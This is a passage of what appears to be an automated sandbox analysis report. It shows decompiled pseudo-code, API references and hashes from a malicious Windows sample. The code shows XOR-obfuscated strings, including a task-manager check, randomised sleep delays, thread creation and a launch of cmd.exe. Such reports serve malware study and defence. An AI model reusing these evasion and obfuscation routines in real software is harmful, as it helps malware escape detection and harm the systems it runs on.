						_t369 = _v48 - _v52;
						_t420 =  *[fs:0x2c];
						if((0x2aaaaaab * (_v48 - _v52) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v48 - _v52) >> 0x20 >> 2) != 0) {
							L30:
							_t420 =  *_t420;
							_t248 =  *0x450fdc; // 0x80000009
							_v40 = 0x2e45464d;
							if(_t248 >  *((intOrPtr*)(_t420 + 4))) {
								E0040EEC8(_t248, 0x450fdc);
								_t440 = _t440 + 4;
								_t474 =  *0x450fdc - 0xffffffff;
								if( *0x450fdc == 0xffffffff) {
									 *0x450f10 = _v40;
									E0040F1DA(_t369, _t474, 0x42d460);
									E0040EE7E(0x450fdc);
									_t440 = _t440 + 8;
								}
							}
							_t249 =  *0x450f13; // 0x0
							if(_t249 != 0) {
								 *0x450f10 =  *0x450f10 ^ 0x0000002e;
								 *0x450f11 =  *0x450f11 ^ 0x0000002e;
								 *0x450f12 =  *0x450f12 ^ 0x0000002e;
								 *0x450f13 = _t249 ^ 0x0000002e;
							}
							_t370 = 0x450f10;
							_v496 = 0;
							_v480 = 0;
							_v476 = 0xf;
							_t106 =  &(_t370[1]); // 0x450f11
							_t406 = _t106;
							do {
								_t250 =  *_t370;
								_t370 =  &(_t370[1]);
							} while (_t250 != 0);
							E004026C0(_t344,  &_v496, 0x450f10, _t370 - _t406);
							_t425 = _v52;
							_t354 = _t425;
							_v40 = 5;
							if(E0040C9E0(_t425,  &_v496) != 0) {
								L47:
								__eflags = _v40 & 0x00000002;
								_v445 = 1;
								if(__eflags == 0) {
									goto L52;
								} else {
									goto L48;
								}
							} else {
								_t300 =  *0x450d3c; // 0x8000000a
								_v40 = 0x45464d01;
								_v445 = 0x2e;
								if(_t300 >  *((intOrPtr*)(_t420 + 4))) {
									E0040EEC8(_t300, 0x450d3c);
									_t440 = _t440 + 4;
									_t480 =  *0x450d3c - 0xffffffff;
									if( *0x450d3c == 0xffffffff) {
										 *0x450d78 = _v40;
										 *0x450d7c = _v445;
										E0040F1DA(_t354, _t480, 0x42d440);
										E0040EE7E(0x450d3c);
										_t440 = _t440 + 8;
									}
								}
								_t301 =  *0x450d7c; // 0x0
								if(_t301 != 0) {
									 *0x450d78 =  *0x450d78 ^ 0x0000002e;
									 *0x450d79 =  *0x450d79 ^ 0x0000002e;
									 *0x450d7a =  *0x450d7a ^ 0x0000002e;
									 *0x450d7b =  *0x450d7b ^ 0x0000002e;
									 *0x450d7c = _t301 ^ 0x0000002e;
								}
								_t389 = 0x450d78;
								_v472 = 0;
								_v456 = 0;
								_v452 = 0xf;
								_t119 =  &(_t389[1]); // 0x450d79
								_t415 = _t119;
								do {
									_t302 =  *_t389;
									_t389 =  &(_t389[1]);
								} while (_t302 != 0);
								E004026C0(_t344,  &_v472, 0x450d78, _t389 - _t415);
								_t425 = _v52;
								_t354 = _t425;
								_v40 = 7;
								_t304 = E0040C9E0(_t425,  &_v472);
								if(_t304 != 0) {
									goto L47;
								} else {
									_v445 = _t304;
									L48:
									_t413 = _v452;
									if(_t413 < 0x10) {
										L52:
										_t402 = _v476;
										if(_t402 < 0x10) {
											L56:
											if(_v445 != 0) {
												goto L89;
											} else {
												_t374 = _v48 - _t425;
												_t402 = 0x2aaaaaab * (_v48 - _t425) >> 0x20 >> 2;
												_t257 = (0x2aaaaaab * (_v48 - _t425) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v48 - _t425) >> 0x20 >> 2);
												_t492 = _t257 - 1;
												if(_t492 < 0) {
													goto L90;
												} else {
													if(_t492 == 0) {
														goto L91;
													} else {
														if(_t257 == 2) {
															_t279 = _t425;
															if( *((intOrPtr*)(_t425 + 0x14)) >= 0x10) {
																_t279 =  *_t425;
															}
															if( *((intOrPtr*)(_t425 + 0x10)) != 1) {
																L68:
																__eflags =  *((intOrPtr*)(_t425 + 0x14)) - 0x10;
																_t385 = _t425;
																if( *((intOrPtr*)(_t425 + 0x14)) >= 0x10) {
																	_t385 =  *_t425;
																}
																__eflags =  *((intOrPtr*)(_t425 + 0x10)) - 2;
																if(__eflags == 0) {
																	_t280 =  *_t385 & 0x000000ff;
																	__eflags = _t280 - 0x72;
																	if(_t280 != 0x72) {
																		L74:
																		asm("sbb eax, eax");
																		_t281 = _t280 | 0x00000001;
																		__eflags = _t281;
																	} else {
																		_t280 =  *(_t385 + 1) & 0x000000ff;
																		__eflags = _t280 - 0x73;
																		if(_t280 != 0x73) {
																			goto L74;
																		} else {
																			_t281 = 0;
																		}
																	}
																	__eflags = _t281;
																	if(__eflags == 0) {
																		_t282 = E00417D76(_t385, __eflags);
																		asm("cdq");
																		_t411 = _t282 % 0xc350 + 0x11170;
																		__eflags = _t411;
																		goto L77;
																	}
																}
															} else {
																_t288 =  *_t279 & 0x000000ff;
																if(_t288 != 0x72) {
																	asm("sbb eax, eax");
																	_t289 = _t288 | 0x00000001;
																	__eflags = _t289;
																} else {
																	_t289 = 0;
																}
																_t497 = _t289;
																if(_t289 != 0) {
																	goto L68;
																} else {
																	_t290 = E00417D76(_t374, _t497);
																	asm("cdq");
																	_t411 = _t290 % 0xc350 + 0x2710;
																	L77:
																	Sleep(_t411);
																	_t450 = _t440 - 0x18;
																	E0040BB10(_t344, _t450, _t411, _t420, _v52 + 0x18);
																	E00408D00(_t344, _t420, _t425, _v52 + 0x18);
																	_t440 = _t450 + 0x18;
																}
															}
														}
														_t409 = _v80;
														if(_t409 < 0x10) {
															L82:
															_t161 = _v268 + 4; // 0x43a364
															 *((intOrPtr*)(_t429 +  *_t161 - 0x100)) = 0x439d00;
															_t165 = _v268 + 4; // 0x43a364
															_t166 =  *_t165 - 0x60; // 0x43a304
															 *((intOrPtr*)(_t429 +  *_t165 - 0x104)) = _t166;
															E0040A490( &_v252);
															_t171 = _v268 + 4; // 0x43a364
															 *((intOrPtr*)(_t429 +  *_t171 - 0x100)) = 0x439ca8;
															_t175 = _v268 + 4; // 0x33323130
															_t176 =  *_t175 - 0x18; // 0x33323118
															 *((intOrPtr*)(_t429 +  *_t175 - 0x104)) = _t176;
															_v16 = 0;
															_v172 = 0x439be0;
															E0040E453( &_v172);
															_t442 = _t440 + 4;
															E0040B8B0( &_v52, _t420);
															_t270 = _v56;
															if(_t270 < 0x10) {
																L86:
																 *[fs:0x0] = _v24;
																_pop(_t421);
																_pop(_t426);
																return E0040EB3F(_t270, _t344, _v32 ^ _t429, _t409, _t421, _t426);
															} else {
																_t409 = _v76;
																_t185 = _t270 + 1; // 0x11
																_t383 = _t185;
																_t272 = _t409;
																if(_t383 < 0x1000) {
																	L85:
																	_push(_t383);
																	_t270 = E0040ED7F(_t409);
																	goto L86;
																} else {
																	_t402 =  *(_t409 - 4);
																	_t383 = _t383 + 0x23;
																	if(_t272 -  *(_t409 - 4) + 0xfffffffc > 0x1f) {
																		goto L92;
																	} else {
																		goto L85;
																	}
																}
															}
														} else {
															_t384 = _v100;
															_t409 = _t409 + 1;
															_t275 = _t384;
															if(_t409 < 0x1000) {
																L81:
																_push(_t409);
																E0040ED7F(_t384);
																_t440 = _t440 + 8;
																goto L82;
															} else {
																_t384 =  *(_t384 - 4);
																_t402 = _t409 + 0x23;
																if(_t275 - _t384 + 0xfffffffc > 0x1f) {
																	goto L92;
																} else {
																	goto L81;
																}
															}
														}
													}
												}
											}
										} else {
											_t354 = _v496;
											_t402 = _t402 + 1;
											_t292 = _t354;
											if(_t402 < 0x1000) {
												L55:
												_push(_t402);
												E0040ED7F(_t354);
												_t425 = _v52;
												_t440 = _t440 + 8;
												goto L56;
											} else {
												_t354 =  *(_t354 - 4);
												_t402 = _t402 + 0x23;
												if(_t292 - _t354 + 0xfffffffc > 0x1f) {
													goto L92;
												} else {
													goto L55;
												}
											}
										}
									} else {
										_t354 = _v472;
										_t414 = _t413 + 1;
										_t296 = _t354;
										if(_t414 < 0x1000) {
											L51:
											_push(_t414);
											E0040ED7F(_t354);
											_t425 = _v52;
											_t440 = _t440 + 8;
											goto L52;
										} else {
											_t354 =  *(_t354 - 4);
											_t402 = _t414 + 0x23;
											if(_t296 - _t354 + 0xfffffffc > 0x1f) {
												goto L92;
											} else {
												goto L51;
											}
										}
									}
								}
							}
						} else {
							_t392 =  *_t420;
							_t316 =  *0x450ec8; // 0x80000008
							_v40 = 0x7b7d6160;
							_v36 = 0x2e6c;
							if(_t316 >  *((intOrPtr*)( *_t420 + 4))) {
								E0040EEC8(_t316, 0x450ec8);
								_t440 = _t440 + 4;
								_t468 =  *0x450ec8 - 0xffffffff;
								if( *0x450ec8 == 0xffffffff) {
									 *0x450d10 = _v40;
									 *0x450d14 = _v36;
									E0040F1DA(_t392, _t468, E0042D470);
									E0040EE7E(0x450ec8);
									_t440 = _t440 + 8;
								}
							}
							_t317 =  *0x450d15; // 0x0
							if(_t317 != 0) {
								 *0x450d10 =  *0x450d10 ^ 0x0000002e;
								 *0x450d11 =  *0x450d11 ^ 0x0000002e;
								 *0x450d12 =  *0x450d12 ^ 0x0000002e;
								 *0x450d13 =  *0x450d13 ^ 0x0000002e;
								 *0x450d14 =  *0x450d14 ^ 0x0000002e;
								 *0x450d15 = _t317 ^ 0x0000002e;
							}
							_t393 = 0x450d10;
							_v472 = 0;
							_v456 = 0;
							_v452 = 0xf;
							_t89 =  &(_t393[1]); // 0x450d11
							_t417 = _t89;
							do {
								_t318 =  *_t393;
								_t393 =  &(_t393[1]);
							} while (_t318 != 0);
							_t369 =  &_v472;
							E004026C0(_t344,  &_v472, 0x450d10, _t393 - _t417);
							_t320 = _v48;
							if(_t320 == _v44) {
								_push( &_v472);
								_push(_t320);
								_t369 =  &_v52;
								E0040CDD0(_t344,  &_v52, _t420, _t425);
								_t418 = _v452;
								__eflags = _t418 - 0x10;
								if(_t418 < 0x10) {
									goto L30;
								} else {
									_t369 = _v472;
									_t419 = _t418 + 1;
									_t322 = _t369;
									__eflags = _t419 - 0x1000;
									if(_t419 < 0x1000) {
										L29:
										_push(_t419);
										E0040ED7F(_t369);
										_t440 = _t440 + 8;
										goto L30;
									} else {
										_t369 =  *(_t369 - 4);
										_t402 = _t419 + 0x23;
										__eflags = _t322 - _t369 + 0xfffffffc - 0x1f;
										if(__eflags > 0) {
											goto L92;
										} else {
											goto L29;
										}
									}
								}
							} else {
								asm("movups xmm0, [ebp-0x1cc]");
								 *_t320 = 0;
								asm("movups [eax], xmm0");
								asm("movq xmm0, [ebp-0x1bc]");
								asm("movq [eax+0x10], xmm0");
								_v48 = _v48 + 0x18;
								goto L30;
							}
						}
					} else {
						if(_t425 < 0x1000) {
							_t336 = E0040ED4F(_t344, _t420, _t425, __eflags, _t425);
							_t454 = _t440 + 4;
							_t420 = _t336;
							L9:
							E00410440(_t420, _v40, _t425);
							_t354 = _t425 + _t420;
							_v196 = _t354;
							_t440 = _t454 + 0xc;
							 *_v240 = _t420;
							 *_v224 = _t420;
							 *_v208 = _t425;
							_t218 = 3;
							goto L11;
						} else {
							_t41 = _t425 + 0x23; // 0x23
							_t341 = _t41;
							_t461 = _t341 - _t425;
							if(_t341 <= _t425) {
								L88:
								E004018C0();
								L89:
								_t221 = E00409650( &_v444, _t354);
								_t441 = _t440 - 0xc;
								L93();
								E0040B460( &_v444, E00402520( &_v520, E0040B750(_t221)));
								E00402450(_t344,  &_v520);
								E00417C2D(0);
								L90:
								E004054C0(_t344, __eflags);
								L91:
								_t442 = _t441 - 0x18;
								_t425 = _t442;
								E0040BB10(_t344, _t442, _t402, _t420, E0040B890( &_v52, 0)); // executed
								E00409480(_t344, _t442, _t402, _t420, _t442); // executed
								goto L92;
							} else {
								_t342 = E0040ED4F(_t344, _t420, _t425, _t461, _t341);
								_t442 = _t440 + 4;
								if(_t342 == 0) {
									L92:
									E004134A7(_t344, _t402, __eflags);
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_push(_t429);
									_t430 = _t442;
									_t232 =  *0x43d054; // 0x8e1b5714
									_v556 = _t232 ^ _t430;
									_push(_t344);
									_v564 = 0x5a5d4b5a;
									_t362 =  *( *[fs:0x2c]);
									_t235 =  *0x450ffc;
									__eflags =  *0x450ffc -  *((intOrPtr*)(_t362 + 4));
									if( *0x450ffc >  *((intOrPtr*)(_t362 + 4))) {
										E0040EEC8(_t235, 0x450ffc);
										__eflags =  *0x450ffc - 0xffffffff;
										if(__eflags == 0) {
											_t197 =  &_v28; // 0x5a5d4b5a
											 *0x450f30 =  *_t197;
											 *0x450f34 = 0x2e;
											E0040F1DA(_t362, __eflags, 0x42d420);
											E0040EE7E(0x450ffc);
										}
									}
									__eflags = _v20 ^ _t430;
									_pop(_t346);
									return E0040EB3F(0x450f30, _t346, _v20 ^ _t430, _t402, _t420, _t425);
								} else {
									_t42 = _t342 + 0x23; // 0x23
									_t420 = _t42 & 0xffffffe0;
									 *((intOrPtr*)(_t420 - 4)) = _t342;
									goto L9;
								}
							}
						}
					}
				}
			}

0x00409670
0x00409671
0x00409679
0x00409680
0x00409684
0x00409686
0x00409688
0x00409693
0x00409694
0x0040969b
0x004096a0
0x004096a2
0x004096a5
0x004096a6
0x004096a7
0x004096ab
0x004096b1
0x004096b6
0x004096c6
0x004096cb
0x004096cd
0x004096d4
0x004096d7
0x004096de
0x004096e5
0x004096e8
0x004096e8
0x004096ea
0x004096eb
0x004096eb
0x004096f6
0x00409706
0x00409710
0x00409717
0x0040971e
0x00409723
0x00409726
0x00409736
0x00409740
0x00409743
0x00409750
0x00409758
0x0040975f
0x00409769
0x00409773
0x0040977b
0x00409786
0x00409789
0x0040979a
0x0040979d
0x004097a0
0x004097a7
0x004097ad
0x004097b9
0x004097bc
0x004097c0
0x004097c3
0x004097c8
0x004097d8
0x00409e63
0x00000000
0x004097de
0x004097e0
0x00409851
0x0040985b
0x0040985b
0x0040985c
0x0040985f
0x0040986b
0x00409872
0x00409879
0x00409880
0x00409885
0x00409892
0x00409894
0x00409894
0x0040989a
0x0040989e
0x004098ad
0x004098ae
0x004098b1
0x004098a0
0x004098a0
0x004098a2
0x004098a7
0x004098a7
0x004098b6
0x004098b7
0x004098c0
0x004098c5
0x004098cd
0x00409894
0x004098dc
0x004098df
0x004098f2
0x00409a3f
0x00409a3f
0x00409a41
0x00409a46
0x00409a53
0x00409a5a
0x00409a5f
0x00409a62
0x00409a69
0x00409a73
0x00409a78
0x00409a85
0x00409a8a
0x00409a8a
0x00409a69
0x00409a8d
0x00409a94
0x00409a96
0x00409a9d
0x00409aa4
0x00409aad
0x00409aad
0x00409ab2
0x00409ab7
0x00409ac1
0x00409acb
0x00409ad5
0x00409ad5
0x00409ad8
0x00409ad8
0x00409ada
0x00409adb
0x00409aed
0x00409af2
0x00409afb
0x00409afd
0x00409b0b
0x00409bfe
0x00409bfe
0x00409c02
0x00409c09
0x00000000
0x00000000
0x00000000
0x00000000
0x00409b11
0x00409b11
0x00409b16
0x00409b1d
0x00409b2a
0x00409b31
0x00409b36
0x00409b39
0x00409b40
0x00409b45
0x00409b55
0x00409b5a
0x00409b67
0x00409b6c
0x00409b6c
0x00409b40
0x00409b6f
0x00409b76
0x00409b78
0x00409b7f
0x00409b86
0x00409b8d
0x00409b96
0x00409b96
0x00409b9b
0x00409ba0
0x00409baa
0x00409bb4
0x00409bbe
0x00409bbe
0x00409bc1
0x00409bc1
0x00409bc3
0x00409bc4
0x00409bd6
0x00409bdb
0x00409be4
0x00409be6
0x00409bed
0x00409bf4
0x00000000
0x00409bf6
0x00409bf6
0x00409c0b
0x00409c0b
0x00409c14
0x00409c48
0x00409c48
0x00409c51
0x00409c85
0x00409c8c
0x00000000
0x00409c92
0x00409c9a
0x00409c9e
0x00409ca6
0x00409ca8
0x00409cab
0x00000000
0x00409cb1
0x00409cb1
0x00000000
0x00409cb7
0x00409cba
0x00409cc4
0x00409cc6
0x00409cc8
0x00409cc8
0x00409cce
0x00409cf9
0x00409cf9
0x00409cfd
0x00409cff
0x00409d01
0x00409d01
0x00409d03
0x00409d07
0x00409d09
0x00409d0c
0x00409d0e
0x00409d1c
0x00409d1c
0x00409d1e
0x00409d1e
0x00409d10
0x00409d10
0x00409d14
0x00409d16
0x00000000
0x00409d18
0x00409d18
0x00409d18
0x00409d16
0x00409d21
0x00409d23
0x00409d25
0x00409d2a
0x00409d32
0x00409d32
0x00000000
0x00409d32
0x00409d23
0x00409cd0
0x00409cd0
0x00409cd5
0x00409cdb
0x00409cdd
0x00409cdd
0x00409cd7
0x00409cd7
0x00409cd7
0x00409ce0
0x00409ce2
0x00000000
0x00409ce4
0x00409ce4
0x00409ce9
0x00409cf1
0x00409d38
0x00409d39
0x00409d42
0x00409d4b
0x00409d50
0x00409d55
0x00409d55
0x00409ce2
0x00409cce
0x00409d58
0x00409d5e
0x00409d8c
0x00409d92
0x00409d95
0x00409da6
0x00409da9
0x00409dac
0x00409db9
0x00409dc4
0x00409dc7
0x00409dd8
0x00409ddb
0x00409dde
0x00409deb
0x00409df3
0x00409dfd
0x00409e02
0x00409e08
0x00409e0d
0x00409e13
0x00409e43
0x00409e46
0x00409e4e
0x00409e4f
0x00409e60
0x00409e15
0x00409e15
0x00409e18
0x00409e18
0x00409e1b
0x00409e23
0x00409e39
0x00409e39
0x00409e3b
0x00000000
0x00409e25
0x00409e25
0x00409e28
0x00409e33
0x00000000
0x00000000
0x00000000
0x00000000
0x00409e33
0x00409e23
0x00409d60
0x00409d60
0x00409d63
0x00409d64
0x00409d6c
0x00409d82
0x00409d82
0x00409d84
0x00409d89
0x00000000
0x00409d6e
0x00409d6e
0x00409d71
0x00409d7c
0x00000000
0x00000000
0x00000000
0x00000000
0x00409d7c
0x00409d6c
0x00409d5e
0x00409cb1
0x00409cab
0x00409c53
0x00409c53
0x00409c59
0x00409c5a
0x00409c62
0x00409c78
0x00409c78
0x00409c7a
0x00409c7f
0x00409c82
0x00000000
0x00409c64
0x00409c64
0x00409c67
0x00409c72
0x00000000
0x00000000
0x00000000
0x00000000
0x00409c72
0x00409c62
0x00409c16
0x00409c16
0x00409c1c
0x00409c1d
0x00409c25
0x00409c3b
0x00409c3b
0x00409c3d
0x00409c42
0x00409c45
0x00000000
0x00409c27
0x00409c27
0x00409c2a
0x00409c35
0x00000000
0x00000000
0x00000000
0x00000000
0x00409c35
0x00409c25
0x00409c14
0x00409bf4
0x004098f8
0x004098f8
0x004098fa
0x004098ff
0x00409906
0x00409912
0x00409919
0x0040991e
0x00409921
0x00409928
0x0040992d
0x0040993b
0x00409941
0x0040994e
0x00409953
0x00409953
0x00409928
0x00409956
0x0040995d
0x0040995f
0x00409966
0x0040996d
0x00409974
0x0040997b
0x00409984
0x00409984
0x00409989
0x0040998e
0x00409998
0x004099a2
0x004099ac
0x004099ac
0x004099b0
0x004099b0
0x004099b2
0x004099b3
0x004099bf
0x004099c5
0x004099ca
0x004099d0
0x004099fb
0x004099fc
0x004099fd
0x00409a00
0x00409a05
0x00409a0b
0x00409a0e
0x00000000
0x00409a10
0x00409a10
0x00409a16
0x00409a17
0x00409a19
0x00409a1f
0x00409a35
0x00409a35
0x00409a37
0x00409a3c
0x00000000
0x00409a21
0x00409a21
0x00409a24
0x00409a2c
0x00409a2f
0x00000000
0x00000000
0x00000000
0x00000000
0x00409a2f
0x00409a1f
0x004099d2
0x004099d2
0x004099d9
0x004099df
0x004099e2
0x004099ea
0x004099ef
0x00000000
0x004099ef
0x004099d0
0x004097e2
0x004097e8
0x00409812
0x00409817
0x0040981a
0x0040981c
0x00409821
0x0040982c
0x0040982f
0x00409835
0x00409838
0x00409840
0x00409848
0x0040984a
0x00000000
0x004097ea
0x004097ea
0x004097ea
0x004097ed
0x004097ef
0x00409e68
0x00409e68
0x00409e6d
0x00409e74
0x00409e79
0x00409e7c
0x00409e9b
0x00409ea6
0x00409ead
0x00409eb2
0x00409eb2
0x00409eb7
0x00409eb7
0x00409ebd
0x00409ec9
0x00409ece
0x00000000
0x004097f5
0x004097f6
0x004097fb
0x00409800
0x00409ed3
0x00409ed3
0x00409ed8
0x00409ed9
0x00409eda
0x00409edb
0x00409edc
0x00409edd
0x00409ede
0x00409edf
0x00409ee0
0x00409ee1
0x00409ee6
0x00409eed
0x00409ef6
0x00409ef7
0x00409f00
0x00409f02
0x00409f07
0x00409f0d
0x00409f14
0x00409f1c
0x00409f23
0x00409f25
0x00409f2d
0x00409f32
0x00409f38
0x00409f42
0x00409f47
0x00409f23
0x00409f52
0x00409f54
0x00409f5d
0x00409806
0x00409806
0x00409809
0x0040980c
0x00000000
0x0040980c
0x00409800
0x004097ef
0x004097e8
0x004097e0

APIs

Part of subcall function 004187F3: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,004094BA,00000000), ref: 00418806
Part of subcall function 004187F3: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418837

__Init_thread_footer.LIBCMT ref: 0040994E
__Init_thread_footer.LIBCMT ref: 00409A85
__Init_thread_footer.LIBCMT ref: 00409B67
Sleep.KERNEL32(?,00450F10,00450F11,?,?,?), ref: 00409D39
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00409DFD
Concurrency::cancel_current_task.LIBCPMT ref: 00409E63
Concurrency::cancel_current_task.LIBCPMT ref: 00409E68

Part of subcall function 004018C0: ___std_exception_copy.LIBVCRUNTIME ref: 004018FE

Part of subcall function 004054C0: GetCurrentProcessId.KERNEL32(8E1B5714), ref: 004054EC
Part of subcall function 004054C0: GetCurrentProcessId.KERNEL32 ref: 00405508
Part of subcall function 004054C0: ShellExecuteA.SHELL32(00000000,00000000,C:\Windows\System32\cmd.exe,00000000,00000000,00000000), ref: 004055A4

Part of subcall function 00409480: CreateThread.KERNELBASE(00000000,00000000,Function_000056A0,00000000,00000000,00000000), ref: 0040957E
Part of subcall function 00409480: Sleep.KERNELBASE(00000BB8), ref: 00409589

__Init_thread_footer.LIBCMT ref: 00409F42

Strings

D@, xrefs: 00409DF3
MFE., xrefs: 00409A46
ZK]Z, xrefs: 00409F25

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: Init_thread_footer$Concurrency::cancel_current_taskCurrentProcessSleepTime$CreateExecuteFileIos_base_dtorShellSystemThreadUnothrow_t@std@@@___std_exception_copy__ehfuncinfo$??2@std::ios_base::_
String ID: D@$MFE.$ZK]Z
API String ID: 3757312541-2629744079
Opcode ID: 854b96dc1673eb9f39248b2d9a866c857c12611e09986af055269af1af8b36b3
Instruction ID: 064849696e65e3bba93a11e8c5a5417ab44cd7f5f829292c5af7ac4386323aa5
Opcode Fuzzy Hash: 854b96dc1673eb9f39248b2d9a866c857c12611e09986af055269af1af8b36b3
Instruction Fuzzy Hash: 0732E071A002488BDB24DF64D845BEEB7B0AB05308F1445BAE805773D3D779AE89CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00405F40 Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 389
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00405F40(void* __ebx, void* __edi) {
				long _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				void _v88;
				struct _SID_IDENTIFIER_AUTHORITY _v96;
				long _v100;
				void* _v104;
				void* _v108;
				char _v276;
				void* _v280;
				int _v284;
				char _v288;
				char _v292;
				char _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				char _v305;
				long _v312;
				long _v316;
				long _v332;
				long* _v336;
				long _v340;
				long _v356;
				signed int _v380;
				short _v460;
				long _v464;
				void* _v472;
				void* __esi;
				void* __ebp;
				signed int _t98;
				signed int _t99;
				intOrPtr _t102;
				signed char _t103;
				signed char _t104;
				void* _t106;
				int _t107;
				intOrPtr _t109;
				signed char _t110;
				signed char _t111;
				void* _t113;
				intOrPtr _t114;
				signed char _t115;
				signed char _t116;
				void* _t118;
				struct HWND__* _t119;
				intOrPtr _t121;
				intOrPtr _t122;
				void* _t127;
				long _t128;
				signed int _t133;
				signed int _t137;
				signed int _t142;
				signed int _t146;
				int _t147;
				long _t152;
				intOrPtr _t156;
				signed char _t157;
				signed char _t158;
				void* _t163;
				void* _t169;
				void* _t191;
				signed int _t193;
				signed char* _t194;
				signed char* _t201;
				signed char* _t204;
				intOrPtr* _t208;
				long _t211;
				long _t216;
				signed char* _t217;
				long* _t222;
				signed char* _t224;
				void* _t225;
				signed char* _t226;
				signed char* _t227;
				intOrPtr _t229;
				void* _t230;
				void* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				void* _t236;
				long* _t237;
				long* _t238;
				long* _t239;
				long* _t240;
				long* _t241;
				long* _t242;
				signed int _t243;

				_t190 = __ebx;
				_push(0xffffffff);
				_push(E0042C687);
				_push( *[fs:0x0]);
				_t236 = _t235 - 0x154;
				_t98 =  *0x43d054; // 0x8e1b5714
				_t99 = _t98 ^ _t233;
				_v20 = _t99;
				_push(__ebx);
				_push(__edi);
				_push(_t99);
				 *[fs:0x0] =  &_v16;
				_v284 = 0;
				_v288 = 0x455d4f5a;
				_v284 = 0x2e5c4943;
				_t229 =  *((intOrPtr*)( *[fs:0x2c]));
				_t102 =  *0x450ebc; // 0x80000010
				if(_t102 >  *((intOrPtr*)(_t229 + 4))) {
					E0040EEC8(_t102, 0x450ebc);
					_t236 = _t236 + 4;
					_t252 =  *0x450ebc - 0xffffffff;
					if( *0x450ebc == 0xffffffff) {
						_t7 =  &_v288; // 0x455d4f5a
						_t8 =  &_v284; // 0x2e5c4943
						 *0x450d40 =  *_t7;
						 *0x450d44 =  *_t8;
						E0040F1DA( *_t8, _t252, E0042CF40);
						E0040EE7E(0x450ebc);
						_t236 = _t236 + 8;
					}
				}
				_t103 =  *0x450d47; // 0x0
				if(_t103 != 0) {
					 *0x450d40 =  *0x450d40 ^ 0x0000002e;
					 *0x450d41 =  *0x450d41 ^ 0x0000002e;
					 *0x450d42 =  *0x450d42 ^ 0x0000002e;
					 *0x450d43 =  *0x450d43 ^ 0x0000002e;
					 *0x450d44 =  *0x450d44 ^ 0x0000002e;
					 *0x450d45 =  *0x450d45 ^ 0x0000002e;
					 *0x450d46 =  *0x450d46 ^ 0x0000002e;
					 *0x450d47 = _t103 ^ 0x0000002e;
				}
				_t237 = _t236 - 0x18;
				_t194 = 0x450d40;
				_t222 = _t237;
				_t9 =  &(_t194[1]); // 0x450d41
				_t224 = _t9;
				 *_t222 = 0;
				_t222[4] = 0;
				_t222[5] = 0xf;
				asm("o16 nop [eax+eax]");
				do {
					_t104 =  *_t194;
					_t194 =  &(_t194[1]);
				} while (_t104 != 0);
				E004026C0(_t190, _t222, 0x450d40, _t194 - _t224); // executed
				_t106 = E00405350(_t190); // executed
				_t238 =  &(_t237[6]);
				if(_t106 != 0) {
					L56:
					_t107 = 1;
					goto L57;
				} else {
					_t109 =  *0x450fa0; // 0x80000011
					_v288 = 0x455d4f7a;
					_v284 = 0x2e5c4943;
					if(_t109 >  *((intOrPtr*)(_t229 + 4))) {
						E0040EEC8(_t109, 0x450fa0);
						_t238 =  &(_t238[1]);
						_t258 =  *0x450fa0 - 0xffffffff;
						if( *0x450fa0 == 0xffffffff) {
							_t15 =  &_v288; // 0x455d4f7a
							_t16 =  &_v284; // 0x2e5c4943
							 *0x450f6c =  *_t15;
							 *0x450f70 =  *_t16;
							E0040F1DA( *_t16, _t258, E0042CF30);
							E0040EE7E(0x450fa0);
							_t238 =  &(_t238[2]);
						}
					}
					_t110 =  *0x450f73; // 0x0
					if(_t110 != 0) {
						 *0x450f6c =  *0x450f6c ^ 0x0000002e;
						 *0x450f6d =  *0x450f6d ^ 0x0000002e;
						 *0x450f6e =  *0x450f6e ^ 0x0000002e;
						 *0x450f6f =  *0x450f6f ^ 0x0000002e;
						 *0x450f70 =  *0x450f70 ^ 0x0000002e;
						 *0x450f71 =  *0x450f71 ^ 0x0000002e;
						 *0x450f72 =  *0x450f72 ^ 0x0000002e;
						 *0x450f73 = _t110 ^ 0x0000002e;
					}
					_t239 = _t238 - 0x18;
					_t201 = 0x450f6c;
					_t222 = _t239;
					_t17 =  &(_t201[1]); // 0x450f6d
					_t226 = _t17;
					 *_t222 = 0;
					_t222[4] = 0;
					_t222[5] = 0xf;
					do {
						_t111 =  *_t201;
						_t201 =  &(_t201[1]);
					} while (_t111 != 0);
					_t203 = _t222;
					E004026C0(_t190, _t222, 0x450f6c, _t201 - _t226); // executed
					_t113 = E00405350(_t190); // executed
					_t240 =  &(_t239[6]);
					if(_t113 != 0) {
						goto L56;
					} else {
						_t114 =  *0x450f74; // 0x80000012
						_v288 = 0x4b5c4759;
						_v284 = 0x5c4f465d;
						_v280 = 0x2e45;
						if(_t114 >  *((intOrPtr*)(_t229 + 4))) {
							E0040EEC8(_t114, 0x450f74);
							_t240 =  &(_t240[1]);
							_t264 =  *0x450f74 - 0xffffffff;
							if( *0x450f74 == 0xffffffff) {
								asm("movq xmm0, [ebp-0x11c]");
								asm("movq [0x450d60], xmm0");
								 *0x450d68 = _v280;
								E0040F1DA(_t203, _t264, E0042CF10);
								E0040EE7E(0x450f74);
								_t240 =  &(_t240[2]);
							}
						}
						_t115 =  *0x450d69; // 0x0
						if(_t115 != 0) {
							 *0x450d60 =  *0x450d60 ^ 0x0000002e;
							 *0x450d61 =  *0x450d61 ^ 0x0000002e;
							 *0x450d62 =  *0x450d62 ^ 0x0000002e;
							 *0x450d63 =  *0x450d63 ^ 0x0000002e;
							 *0x450d64 =  *0x450d64 ^ 0x0000002e;
